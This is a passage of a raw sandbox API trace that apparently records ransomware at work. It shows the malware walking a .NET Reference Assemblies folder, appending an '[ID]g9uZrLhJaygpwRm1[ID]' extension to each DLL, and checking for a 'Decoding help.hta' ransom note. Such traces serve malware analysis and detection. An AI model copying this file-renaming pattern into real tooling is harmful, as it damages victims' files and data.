Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.596] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Abstractions.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" [0057.596] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" [0057.597] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.abstractions.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Abstractions.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.abstractions.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.597] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6488e03, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb6488e03, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb6488e03, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.DynamicData.Design.dll", cAlternateFileName="")) returned 1 [0057.597] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.597] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.597] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.597] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.DynamicData.Design.dll") returned -1 [0057.597] lstrlenW (lpString="System.Web.DynamicData.Design.dll") returned 33 [0057.597] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.597] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.597] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.597] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.DynamicData.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" [0057.597] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" [0057.597] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.597] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.design.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.design.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.597] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb64d50c3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb64d50c3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb64d50c3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.DynamicData.dll", cAlternateFileName="")) returned 1 [0057.597] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.597] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.598] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.DynamicData.dll") returned -1 [0057.598] lstrlenW (lpString="System.Web.DynamicData.dll") returned 26 [0057.598] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.598] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.598] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.DynamicData.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" [0057.598] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" [0057.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.DynamicData.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.dynamicdata.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.598] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6521384, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb6521384, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb6521384, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Entity.Design.dll", cAlternateFileName="")) returned 1 [0057.598] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.598] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.598] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Entity.Design.dll") returned -1 [0057.598] lstrlenW (lpString="System.Web.Entity.Design.dll") returned 28 [0057.598] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.598] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.599] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.599] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Entity.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" [0057.599] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" [0057.599] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.design.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.design.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.599] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6677fe6, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb6677fe6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb6677fe6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x22000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Entity.dll", cAlternateFileName="")) returned 1 [0057.599] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.599] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.599] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.599] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.599] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Entity.dll") returned -1 [0057.599] lstrlenW (lpString="System.Web.Entity.dll") returned 21 [0057.599] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.599] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.599] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Entity.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" [0057.599] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" [0057.599] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Entity.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.entity.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.599] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb65b9905, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb65b9905, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb65b9905, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x52000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Extensions.Design.dll", cAlternateFileName="")) returned 1 [0057.600] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.600] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.600] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.600] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.600] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Extensions.Design.dll") returned -1 [0057.600] lstrlenW (lpString="System.Web.Extensions.Design.dll") returned 32 [0057.600] lstrcmpiW (lpString1="[ID]", lpString2=".dll") returned 1 [0057.600] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.600] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.600] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Extensions.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" [0057.600] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" [0057.600] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0057.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.design.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.Design.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\system.web.extensions.design.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.600] FindNextFileW (in: hFindFile=0x5e2bf0, lpFindFileData=0xaf0fd30 | out: lpFindFileData=0xaf0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46a196b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb46a196b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb46c7acc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x138000, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Web.Extensions.dll", cAlternateFileName="")) returned 1 [0057.600] lstrcpyW (in: lpString1=0x1148d0c0, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.600] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.600] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" [0057.600] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\microsoft\\framework\\v3.5\\decoding help.hta")) returned 0x1 [0057.600] lstrcmpiW (lpString1="Decoding help.hta", lpString2="System.Web.Extensions.dll") returned -1 [0057.600] lstrlenW (lpString="System.Web.Extensions.dll") returned 25 [0057.601] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*" [0057.601] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\*.*") returned 76 [0057.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\", lpString2="System.Web.Extensions.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" [0057.601] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Web.Extensions.dll" | out: 